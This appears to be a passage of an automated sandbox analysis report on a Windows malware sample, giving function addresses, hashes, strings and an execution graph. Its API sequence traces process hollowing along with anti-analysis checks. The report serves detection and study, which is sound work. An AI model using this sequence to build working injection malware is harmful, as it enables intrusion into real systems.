                    • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                    • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                    • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                    • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                    Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .\crypto\err\err.c$unknown
                    • API String ID: 0-565200744
                    • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                    • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                    • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                    • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                    Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0042419D
                    • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: DebuggerPresent_memset
                    • String ID: i;B
                    • API String ID: 2328436684-472376889
                    • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                    • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                    • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                    • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                    Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                    • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: 8Q
                    • API String ID: 3761405300-2096853525
                    • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                    • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                    • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                    • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                    Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                      • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                    • _memset.LIBCMT ref: 00413C83
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                    • String ID: vector<T> too long
                    • API String ID: 1327501947-3788999226
                    • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                    • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                    • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                    • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                    Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _fputws$CreateDirectory
                    • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                    • API String ID: 2590308727-54166481
                    • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                    • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                    • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                    • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                    Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: Assertion failed: %s, file %s, line %d
                    • API String ID: 3494438863-969893948
                    • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                    • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                    • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                    • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                    Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00480686
                      • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                    Strings
                    • .\crypto\evp\digest.c, xrefs: 00480638
                    • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset_raise
                    • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                    • API String ID: 1484197835-3867593797
                    • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                    • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                    • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                    • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                    Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    • std::exception::exception.LIBCMT ref: 0044F251
                      • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                    • __CxxThrowException@8.LIBCMT ref: 0044F266
                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                    • String ID: TeM
                    • API String ID: 757275642-2215902641
                    • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                    • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                    • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                    • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

                    Execution Graph

                    Execution Coverage:1.1%
                    Dynamic/Decrypted Code Coverage:97.4%
                    Signature Coverage:0%
                    Total number of Nodes:39
                    Total number of Limit Nodes:7
                    execution_graph 33584 2139000 33587 2139026 33584->33587 33588 2139035 33587->33588 33591 21397c6 33588->33591 33592 21397e1 33591->33592 33593 21397ea CreateToolhelp32Snapshot 33592->33593 33594 2139806 Module32First 33592->33594 33593->33592 33593->33594 33595 2139815 33594->33595 33597 2139025 33594->33597 33598 2139485 33595->33598 33599 21394b0 33598->33599 33600 21394c1 VirtualAlloc 33599->33600 33601 21394f9 33599->33601 33600->33601 33601->33601 33602 21d0000 33605 21d0630 33602->33605 33604 21d0005 33606 21d064c 33605->33606 33608 21d1577 33606->33608 33611 21d05b0 33608->33611 33614 21d05dc 33611->33614 33612 21d061e 33613 21d05e2 GetFileAttributesA 33613->33614 33614->33612 33614->33613 33616 21d0420 33614->33616 33617 21d04f3 33616->33617 33618 21d04ff CreateWindowExA 33617->33618 33619 21d04fa 33617->33619 33618->33619 33620 21d0540 PostMessageA 33618->33620 33619->33614 33621 21d055f 33620->33621 33621->33619 33623 21d0110 VirtualAlloc GetModuleFileNameA 33621->33623 33624 21d017d CreateProcessA 33623->33624 33625 21d0414 33623->33625 33624->33625 33627 21d025f VirtualFree VirtualAlloc Wow64GetThreadContext 33624->33627 33625->33621 33627->33625 33628 21d02a9 ReadProcessMemory 33627->33628 33629 21d02e5 VirtualAllocEx NtWriteVirtualMemory 33628->33629 33630 21d02d5 NtUnmapViewOfSection 33628->33630 33633 21d033b 33629->33633 33630->33629 33631 21d039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33634 21d03fb ExitProcess 33631->33634 33632 21d0350 NtWriteVirtualMemory 33632->33633 33633->33631 33633->33632

                    Executed Functions

                    Function 021D0110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 021D0156
                    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 021D016C
                    • CreateProcessA.KERNELBASE(?,00000000), ref: 021D0255
                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 021D0270
                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 021D0283
                    • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 021D029F
                    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021D02C8
                    • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 021D02E3
                    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 021D0304
                    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 021D032A
                    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 021D0399
                    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021D03BF
                    • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 021D03E1
                    • ResumeThread.KERNELBASE(00000000), ref: 021D03ED
                    • ExitProcess.KERNEL32(00000000), ref: 021D0412
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                    • String ID:
                    • API String ID: 93872480-0
                    • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                    • Instruction ID: 5e6dff79d4bda33cf757ffcc24754d7f4e95b6a23f6f422c585cc489dfe84d16
                    • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                    • Instruction Fuzzy Hash: F9B1B574A00208EFDB44CF98C895F9EBBB5BF88314F248158E909AB395D771AE41CF94
                    Function 021D0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 15 21d0420-21d04f8 17 21d04ff-21d053c CreateWindowExA 15->17 18 21d04fa 15->18 20 21d053e 17->20 21 21d0540-21d0558 PostMessageA 17->21 19 21d05aa-21d05ad 18->19 20->19 22 21d055f-21d0563 21->22 22->19 23 21d0565-21d0579 22->23 23->19 25 21d057b-21d0582 23->25 26 21d05a8 25->26 27 21d0584-21d0588 25->27 26->22 27->26 28 21d058a-21d0591 27->28 28->26 29 21d0593-21d0597 call 21d0110 28->29 31 21d059c-21d05a5 29->31 31->26
                    APIs
                    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 021D0533
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateWindow
                    • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                    • API String ID: 716092398-2341455598
                    • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                    • Instruction ID: 40bf50263d3e7b14b716757d9e9e3ba7bed3666a5a1c10cf76faf7dbb7cf94dc
                    • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                    • Instruction Fuzzy Hash: 97512A70D48388DEEB11CBE8C849BDEBFB2AF15708F144058D5447F286C3BA5658CB66
                    Function 021D05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 32 21d05b0-21d05d5 33 21d05dc-21d05e0 32->33 34 21d061e-21d0621 33->34 35 21d05e2-21d05f5 GetFileAttributesA 33->35 36 21d05f7-21d05fe 35->36 37 21d0613-21d061c 35->37 36->37 38 21d0600-21d060b call 21d0420 36->38 37->33 40 21d0610 38->40 40->37
                    APIs
                    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 021D05EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID: apfHQ$o
                    • API String ID: 3188754299-2999369273
                    • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                    • Instruction ID: b0f073a5268a3ce98d2069f8373152041842886bc38498f37f87855314de0c30
                    • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                    • Instruction Fuzzy Hash: 52017C70C0425CEEDF10DBA8C4183AEBFB5AF45308F1481D9C4092B242D7B69B98CBA2
                    Function 021397C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 41 21397c6-21397df 42 21397e1-21397e3 41->42 43 21397e5 42->43 44 21397ea-21397f6 CreateToolhelp32Snapshot 42->44 43->44 45 2139806-2139813 Module32First 44->45 46 21397f8-21397fe 44->46 47 2139815-2139816 call 2139485 45->47 48 213981c-2139824 45->48 46->45 51 2139800-2139804 46->51 52 213981b 47->52 51->42 51->45 52->48
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021397EE
                    • Module32First.KERNEL32(00000000,00000224), ref: 0213980E
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311439366.0000000002139000.00000040.00000020.00020000.00000000.sdmp, Offset: 02139000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_2139000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: c206194549f7c39b2a672f75fd92a5e51e1bdbf81c5ae6ca8e7b4048cb881296
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 18F096316407147FD7213FF5A88DB6F76E9AF89625F100678E646911C0DBB0E8458A61
                    Function 02139485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 54 2139485-21394bf call 2139798 57 21394c1-21394f4 VirtualAlloc call 2139512 54->57 58 213950d 54->58 60 21394f9-213950b 57->60 58->58 60->58
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021394D6
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311439366.0000000002139000.00000040.00000020.00020000.00000000.sdmp, Offset: 02139000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_2139000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: bd2ce1d66f85f55fb66edd4c031335dee9444dc35fe9cd3715afddefea51dbee
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 2C113979A40208EFDB01DF98C985E99BBF5EF08350F0580A5F9489B361D371EA90EF80

                    Non-executed Functions

                    Function 021F6437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 553 21f6437-21f6440 554 21f6466 553->554 555 21f6442-21f6446 553->555 556 21f6468-21f646b 554->556 555->554 557 21f6448-21f6459 call 21f9636 555->557 560 21f646c-21f647d call 21f9636 557->560 561 21f645b-21f6460 call 21f5ba8 557->561 566 21f647f-21f6480 call 21f158d 560->566 567 21f6488-21f649a call 21f9636 560->567 561->554 570 21f6485-21f6486 566->570 572 21f64ac-21f64cd call 21f5f4c call 21f6837 567->572 573 21f649c-21f64aa call 21f158d * 2 567->573 570->561 582 21f64cf-21f64dd call 21f557d 572->582 583 21f64e2-21f6500 call 21f158d call 21f4edc call 21f4d82 call 21f158d 572->583 573->570 588 21f64df 582->588 589 21f6502-21f6505 582->589 591 21f6507-21f6509 583->591 588->583 589->591 591->556
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                    • String ID:
                    • API String ID: 1442030790-0
                    • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                    • Instruction ID: 731c3039ef0b3b014d0b6cc42eee148ad304c228b6146f2ba184466db7a4c0fe
                    • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                    • Instruction Fuzzy Hash: 6A2105311C4281FEE7B1BF65DC01E0BBBEADF41760B508029EBB8550B0EB228900CF90
                    Function 021F3F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 597 21f3f16-21f3f2f 598 21f3f49-21f3f5e call 21fbdc0 597->598 599 21f3f31-21f3f3b call 21f5ba8 call 21f4c72 597->599 598->599 605 21f3f60-21f3f63 598->605 608 21f3f40 599->608 606 21f3f77-21f3f7d 605->606 607 21f3f65 605->607 611 21f3f7f 606->611 612 21f3f89-21f3f9a call 2200504 call 22001a3 606->612 609 21f3f6b-21f3f75 call 21f5ba8 607->609 610 21f3f67-21f3f69 607->610 613 21f3f42-21f3f48 608->613 609->608 610->606 610->609 611->609 615 21f3f81-21f3f87 611->615 621 21f4185-21f418f call 21f4c9d 612->621 622 21f3fa0-21f3fac call 22001cd 612->622 615->609 615->612 622->621 627 21f3fb2-21f3fbe call 22001f7 622->627 627->621 630 21f3fc4-21f3fcb 627->630 631 21f3fcd 630->631 632 21f403b-21f4046 call 22002d9 630->632 634 21f3fcf-21f3fd5 631->634 635 21f3fd7-21f3ff3 call 22002d9 631->635 632->613 638 21f404c-21f404f 632->638 634->632 634->635 635->613 642 21f3ff9-21f3ffc 635->642 640 21f407e-21f408b 638->640 641 21f4051-21f405a call 2200554 638->641 644 21f408d-21f409c call 2200f40 640->644 641->640 650 21f405c-21f407c 641->650 645 21f413e-21f4140 642->645 646 21f4002-21f400b call 2200554 642->646 653 21f409e-21f40a6 644->653 654 21f40a9-21f40d0 call 2200e90 call 2200f40 644->654 645->613 646->645 655 21f4011-21f4029 call 22002d9 646->655 650->644 653->654 663 21f40de-21f4105 call 2200e90 call 2200f40 654->663 664 21f40d2-21f40db 654->664 655->613 660 21f402f-21f4036 655->660 660->645 669 21f4107-21f4110 663->669 670 21f4113-21f4122 call 2200e90 663->670 664->663 669->670 673 21f414f-21f4168 670->673 674 21f4124 670->674 675 21f413b 673->675 676 21f416a-21f4183 673->676 677 21f412a-21f4138 674->677 678 21f4126-21f4128 674->678 675->645 676->645 677->675 678->677 679 21f4145-21f4147 678->679 679->645 680 21f4149 679->680 680->673 681 21f414b-21f414d 680->681 681->645 681->673
                    APIs
                    • _memset.LIBCMT ref: 021F3F51
                      • Part of subcall function 021F5BA8: __getptd_noexit.LIBCMT ref: 021F5BA8
                    • __gmtime64_s.LIBCMT ref: 021F3FEA
                    • __gmtime64_s.LIBCMT ref: 021F4020
                    • __gmtime64_s.LIBCMT ref: 021F403D
                    • __allrem.LIBCMT ref: 021F4093
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021F40AF
                    • __allrem.LIBCMT ref: 021F40C6
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021F40E4
                    • __allrem.LIBCMT ref: 021F40FB
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021F4119
                    • __invoke_watson.LIBCMT ref: 021F418A
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                    • Instruction ID: 383f95bd73039d2349e1f9f435b18f771c259ff5d0e6d8813d9549107a589b1c
                    • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                    • Instruction Fuzzy Hash: 0D71FA71A40716ABE754DE79CC80B6BB3B9AF00324F14417AE734E76C1E770EA408B91
                    Function 021F650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                    • String ID:
                    • API String ID: 3432600739-0
                    • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                    • Instruction ID: de735d4f1c36252ef62ed89d6e90ed22e4634ba9dac3743f8018e8a25fbbabc1
                    • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
